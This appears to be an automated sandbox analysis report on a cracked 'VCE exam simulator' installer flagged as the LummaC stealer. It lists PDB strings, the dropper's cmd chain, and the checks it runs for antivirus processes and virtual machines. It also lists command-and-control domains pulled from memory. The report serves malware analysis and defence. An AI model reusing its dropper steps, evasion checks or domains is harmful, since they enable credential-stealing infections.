            Source: Binary string: pwrshplugin.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: syssetup.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-shcore-stream-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-service-management-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: PerceptionSimulation.ProxyStubs.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdadc.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ProximityCommon.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wlanutil.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pdhui.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wsock32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: panmap.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odtext32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-lsalookup-l2-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msctfui.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: umdmxfrm.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ss-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msiltcfg.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: lz32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msiltcfg.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmpbk32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: hnetmon.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: CHxReadingStringIME.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: vpnikeapi.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msrle32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: usbperf.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: clb.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: winrssrv.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ZipContainer.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: API-MS-Win-Eventing-Controller-L1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: spwinsat.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: WinSyncMetastore.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: winrssrv.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: RpcNs4.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdasc.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: Microsoft.BitLocker.Structures.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msjint40.pdbGetFolderPathAndSubDirWSHELL32.dllc source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ifmon.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: VscMgrPS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir41_qc.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: usbperf.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: API-MS-Win-Eventing-Provider-L1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pspluginwkr.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: svcext.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msrating.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-base-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: d.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ifsutilx.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pcwum.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SyncInfrastructurePS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: time-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IMEDICAPICCPS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-stringloader-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wsnmp32.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-processthreads-l1-1-2.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msxactps.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shunimpl.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: NcdProp.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: RacEngn.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: PerfCounterInstaller.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: framedyn.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odbcji32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mdminst.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pstorec.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odbcbcp.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: NetworkItemFactory.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IMTCTRLN.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msafd.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaurl.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: dfshim.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: oddbse32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: DBnmpntw.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-privateprofile-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SetIEInstalledDateAI.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-shlwapi-legacy-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ODBCCR32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IEFileInstallAI.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: RpcNs4.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shunimpl.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: UserDataTypeHelperUtil.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: grouptrusteeai.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmcfg32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cliconfg.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SetIEInstalledDateAI.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IconCodecService.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: API-MS-Win-Security-LsaPolicy-L1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmlua.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: TTDPlm.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mdminst.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir50_qcx.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: vpnikeapi.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: fvecerts.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cliconfg.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mssip32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: LAPRXY.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IconCodecService.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-lsalookup-l2-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-processenvironment-l1-2-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: TTDLoader.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: netfxconfig.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msiwer.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-service-private-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wmdrmsdk.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: icmp.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ms-win-core-version-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SEMgrPS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmstplua.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: spnet.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-service-management-l2-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir50_32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-localization-obsolete-l1-2-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odpdx32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mscat32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ProximityCommon.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ifsutilx.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: security.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: securebootai.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: oddbse32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: VirtualDisplayManager.ProxyStubs.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SensApi.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: nddeapi.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odexl32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmstplua.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: DBnmpntw.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msjint40.pdbV source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SAS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: icmp.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shpafact.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: rasctrs.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: Microsoft.BitLocker.Structures.pdbiC source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: icmui.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ms-win-service-management-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: uniplat.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: altspace.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mrt100.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: grouptrusteeai.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wshunix.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: security.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-file-l2-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tapisysprep.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tapiperf.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: licmgr10.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: syssetup.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odexl32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mgmtapi.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SensApi.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: NcdProp.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: panmap.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: avicap32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ntlanui2.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: RacEngn.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: VEore-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wsnmp32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: lz32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tpmcompc.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wksprtPS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaer.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: UserDataTypeHelperUtil.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-provider-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmcfg32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SAS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ntlanui2.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ZipContainer.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wmcodecdspps.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-debug-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odfox32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mfdvdec.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: NetworkItemFactory.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: LAPRXY.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wsock32.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: API-MS-Win-Core-Kernel32-Private-L1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ws2help.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pwrshplugin.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SyncInfrastructurePS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-string-obsolete-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msiwer.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ms-win-security-lsalookup-l2-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IEFileInstallAI.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wksprtPS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msrle32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: sqlxmlx.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mfH263Enc.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-registry-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-sddl-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odfox32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pcwum.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wmcodecdspps.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shfolder.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: rnr20.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SEMgrPS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: WSClient.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: TTDPlm.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: MFVFW.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaurl.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaer.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmlua.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msrating.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: rnr20.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: uniplat.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wlanutil.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tient.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir50_32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shfolder.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: PerfCounterInstaller.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-threadpool-private-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msimtf.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odtext32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: riched32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: riched32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: hmmapi.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wmdrmsdk.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: spwinsat.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: avicap32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msxactps.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: PerceptionSimulation.ProxyStubs.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: API-MS-Win-Core-ProcessTopology-Obsolete-L1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tapisysprep.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: svcext.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mrt_map.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir41_qcx.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: VirtualDisplayManager.ProxyStubs.pdb source: vce exam simulator 2.2.1 crackk.exe

            Persistence and Installation Behavior

            barindex
            Drops PE files with a suspicious file extension
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\459250\Spa.comJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\459250\Spa.comJump to dropped file
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com TID: 7896Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com TID: 7892Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\459250\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\459250Jump to behavior
            Source: Spa.com, 0000000A.00000003.2227913157.0000000001D33000.00000004.00000020.00020000.00000000.sdmp, Spa.com, 0000000A.00000002.2229391577.0000000001D33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
            Source: Spa.com, 0000000A.00000002.2229775200.00000000043E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Spa.com, 0000000A.00000002.2229775200.00000000043E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWc
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: Spa.com, 0000000A.00000003.1996453249.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
            Source: Spa.com, 0000000A.00000003.1996453249.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
            Source: Spa.com, 0000000A.00000003.1996453249.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
            Source: Spa.com, 0000000A.00000003.1996453249.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
            Source: Spa.com, 0000000A.00000003.1996453249.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
            Source: Spa.com, 0000000A.00000003.1996453249.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
            Source: Spa.com, 0000000A.00000003.1996453249.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
            Source: Spa.com, 0000000A.00000003.1996453249.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
            Source: Spa.com, 0000000A.00000003.1996453249.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: bithithol.click
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Walls Walls.cmd & Walls.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 459250Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Sorry" Branches Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Penalties + ..\Let + ..\No + ..\Giant + ..\Instance + ..\Reed + ..\Hawk yJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\459250\Spa.com Spa.com yJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
            Source: Spa.com, 0000000A.00000002.2228331112.0000000000513000.00000002.00000001.01000000.00000007.sdmp, Spa.com, 0000000A.00000003.2000406005.000000000497D000.00000004.00000800.00020000.00000000.sdmp, Spa.com.1.dr, Earned.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
